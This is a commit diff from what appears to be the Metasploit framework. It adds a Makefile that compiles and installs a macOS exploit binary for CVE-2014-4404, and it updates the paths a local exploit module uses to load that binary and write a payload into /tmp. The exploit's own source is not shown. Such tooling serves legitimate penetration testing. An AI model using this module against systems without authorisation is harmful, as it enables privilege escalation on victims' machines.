Change paths, add makefile and compile
parent
b6306ef7a2
commit
7772da5e3f
Binary file not shown.
|
@ -0,0 +1,11 @@
|
|||
all: key_exploit
|
||||
|
||||
key_exploit: key_exploit.c
|
||||
clang -o key_exploit key_exploit.c -framework CoreFoundation -framework IOKit -g -D_FORTIFY_SOURCE=0
|
||||
|
||||
install: key_exploit
|
||||
install -m 755 key_exploit ../../../../data/exploits/CVE-2014-4404
|
||||
|
||||
clean:
|
||||
rm -rf key_exploit
|
||||
rm -rf key_exploit.dSYM
|
|
@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
|
||||
binary_exploit = File.read(File.join(osx_path, 'key_exploit.bin'))
|
||||
exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
|
||||
binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
|
||||
binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
|
||||
exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
||||
payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
||||
|
|
Loading…
Reference in New Issue